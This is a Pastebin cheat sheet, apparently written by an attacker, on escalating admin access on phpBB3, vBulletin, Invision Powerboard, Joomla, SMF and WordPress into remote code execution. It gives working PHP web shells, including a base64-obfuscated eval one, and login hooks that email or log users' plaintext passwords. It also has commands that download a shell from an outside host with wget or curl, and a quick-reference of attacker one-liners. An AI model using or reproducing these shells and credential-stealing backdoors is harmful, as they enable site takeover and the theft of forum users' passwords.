Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- _ _ _ _
- | |__ __ _ __| |____| |___ ___ _ _ ___ __| |
- | '_ \/ _` / _| / / _` / _ \/ _ \ '_/ -_) _` |
- |_.__/\__,_\__|_\_\__,_\___/\___/_| \___\__,_| 1. phpBB3
- 2. vBull
- nTha 3. IPB
- ___ _ ___ 4. Joomla
- |_ ) |__/ _ \ 5. SMF
- / /| / /\_, / 6. Wordpress
- /___|_\_\ /_/ 7. QuickRef
- This txt is about escalating access when you have an admin
- account on a cms or forum and also backdooring the login
- protocol. Enjoy sluts - Will add more when I see em.
- Note: This is a combined list some are my writings
- and some are just grabbed from the nets.
- _ _____ _____ ___
- ___| |_ ___| __ | __ |_ |
- | . | | . | __ -| __ -|_ |
- | _|_|_| _|_____|_____|___|
- |_| |_|
- The newest version of the most popular free forum is phpBB3.
- I would even venture to say phpBB is the most used forum on
- the net today. Anywho here we go.
- Escalation:
- Step 1. Admin Panel > Security Settings > Allow php.... ON
- Step 2. Styles > Templates > Edit > faq_blah.html
- Step 3. Enter following code.
- <!-- PHP -->$cmd = $_GET['cmd'];
- system("$cmd", $return);
- ?><!-- ENDPHP -->
- Step 4.Call faq.php
- Example: http://www.zomgownme.com/phpBB3/faq.php?cmd=ls
- Login Backdoor:
- Step 1. Open file includes/functions.php
- Step 2. FIND
- $result = $auth->login($username, $password, $autologin, $viewonline, $admin);
- Step 3. Add this after it:
- $sitename = "domain.tld";
- $recipient = 'youremail@gmail.com';
- $subject = 'Password Alert - sitename';
- $message = "Sitename: $sitename - Username: $username - Password: $password";
- mail($recipient, $subject, $message);
- _____ _ _ _ _
- _ _| __ |_ _| | |___| |_|_|___
- | | | __ -| | | | | -_| _| | |
- \_/|_____|___|_|_|___|_| |_|_|_|
- vBulletin is the most popular paid forum. It is constantly
- upgraded and has the best support because of that.
- Escalation:
- Step 1. On the sidebar select Plugins & Products
- Step 2. Select Add New Plugin
- Step 3. Complete the form like below
- Product: vBulletin
- Hook Location: Ajax_Complete
- Title: Whatever
- Execution Order: 5
- Code: if(isset($_GET['cmd'])){echo "<h1>lol</h1><pre>"; system($_GET['cmd']);exit;}
- Check Plugin Is ACTIVE
- click Save
- Step 4. Now go to domain.com/path/ajax.php?cmd=ls
- Login Backdoor:
- For Versions 3.6.5-.10 & 3.7.0 & 3.7.3 PL1 & 3.8X
- Step 1. Open global.php - it's in the main directory
- Step 2. Search for the string below
- $show['nopasswordempty'] = defined('DISABLE_PASSWORD_CLEARING') ? 1 : 0;
- Step 3. Null the line out by adding // infront of the line
- Step 4. Open login.php - it's in the main directory
- Step 5. Search for process_new_login and add the following code under
- $lg_username = strtolower($vbulletin->GPC["vb_login_username"]);
- $lg_password = $vbulletin->GPC["vb_login_password"];
- $lg_file = "./includes/lg.html";
- $sql_query = @mysql_query("SELECT * FROM " . TABLE_PREFIX . "user WHERE username='" . $lg_username . "'");
- while($row = @mysql_fetch_array($sql_query))
- {
- if(strlen($lg_password) > 1 AND strlen($lg_username) > 1)
- {
- $fp1 = @fopen($lg_file, "a+");
- @fwrite($fp1, $lg_username . ' : ' . $lg_password." (" . $row["email"] . ")\n");
- @fclose($fp1);
- $f = @file($lg_file);
- $new = array_unique($f);
- $fp = @fopen($lg_file, "w");
- foreach($new as $values)
- {
- @fputs($fp, $values);
- }
- @fclose($fp);
- }
- }
- Step 6. Check the log file at domain.com/path/includes/lg.html to make sure
- it's actually logging. If it is not create the file and give it the proper
- properties.
- _____ _____ _____ _
- | | _ | | __ |___ ___ ___ _| |
- |- -| __|_| __ -| . | .'| _| . |
- |_____|__| |_|_____|___|__,|_| |___|
- Invision Powerboard is another popular forum. If it's popular you gotta know
- how to own it.
- Escalation:
- Step 1. Go to Admin > Look and Feel > Manage languages
- Step 2. Then choose public_help
- Step 3. Edit help_txt which originally is "Choose a topic from the list or search..."
- Step 4. Add php code like below
- ${${phpinfo()}}
- ${${system(wget http://domain.com/shell.txt)}}
- Step 5. Save changes
- Step 6. Then go to the help module which is located at
- http://domain.com/ipb/index.php?app=core&module=help
- No Logging here haven't had to yet.
- __ _
- __| |___ ___ _____| |___
- | | | . | . | | | .'|
- |_____|___|___|_|_|_|_|__,|
- Joomla is a free CMS and is widely used.
- Escalation Method 1:
- Step 1. Select Extensions at the top and go to Template Manager
- Step 2. Seletect the template and go to edit HTML
- Step 3. Add php code to get a shell on the site
- system("curl -o shell.php http://www.domain.com/shell.txt");
- $cmd = $_GET['cmd'];
- system("$cmd", $return);
- Escalation Method 2:
- Step 1. Go to Configuration
- Step 2. Go to System
- Step 3. Allow .php in extensions
- Step 4. Go the media manager
- Step 5. Then upload your shell
- _____ _____ _____
- | __| | __|
- |__ | | | | __|
- |_____|_|_|_|__|
- Simple Machine Forums is another freebie for kids on the interwebs.
- Escalation for SMF 1.1.4 Method 1:
- Step 1. Enable Attachments
- Step 2. Disable encrypt filenames function
- Step 3. Enable php extension
- Step 4. Upload an attachment(shell.php) in a new topic window.
- Escalation for SMF 1.1.4 Method 2:
- You can edit the template and add php code to it.
- _ _ _ _
- | | | |___ ___ _| |___ ___ ___ ___ ___
- | | | | . | _| . | . | _| -_|_ -|_ -|
- |_____|___|_| |___| _|_| |___|___|___|
- |_|
- The most common blogger software.
- Escalation Method 1:
- Step 1. Login as Admin and Click on Media on the sidebar
- Step 2. Click add new under library
- Step 3. Click Select files and upload your shell
- Step 4. Once uploaded a prompt will come up and give you
- the path to the shell
- Escalation Method 2:
- Step 1. Login as admin and click on appearance on the sidebar
- step 2. Click Editor
- Step 3. Click Comments(comments.php) on the right side
- Step 4. Insert your php code
- Step 5. Call comments.php in the wordpress template
- www.domain.com/wp-content/themes/atahualpa.3.2/atahualpa/comments.php
- _____ _ _ _____ ___
- | |_ _|_|___| |_ | __ |___| _|___ ___ ___ ___ ___ ___ ___
- | | | | | | _| '_| | -| -_| _| -_| _| -_| | _| -_|_ -|
- |__ _|___|_|___|_,_| |__|__|___|_| |___|_| |___|_|_|___|___|___|
- |__|
- This is a little area I added since I know I will be referring to this document
- frequently. These are just simple things I use alot and instead of searching
- for txt files on my pc I can just quickly view it here.
- 1. Python Simple httpserver good for quickly dling dbs without having to cp or mv'n
- python -m SimpleHTTPServer 39282 (thanks w)
- 2. Simple phpdoor I use frequently.
- $cmd = $_GET['cmd'];
- system("$cmd", $return);
- or
- eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOyBpZigkX0dFVFsnY21kJ10peyBzeXN0ZW0oJF9HRVRbJ2NtZCddLCAkcmV0dXJuKTsgfQ=='));
- or
- if($@_GET['file']){
- include($_GET['file']);
- }
- 3. Find writeable areas
- find . -perm -2 -ls
- 4. Tar up a directory
- tar -cvzf name folder
- 5. i <3 curl
- curl -o shell.php http://www.domain.com/shell.txt
Add Comment
Please, Sign In to add comment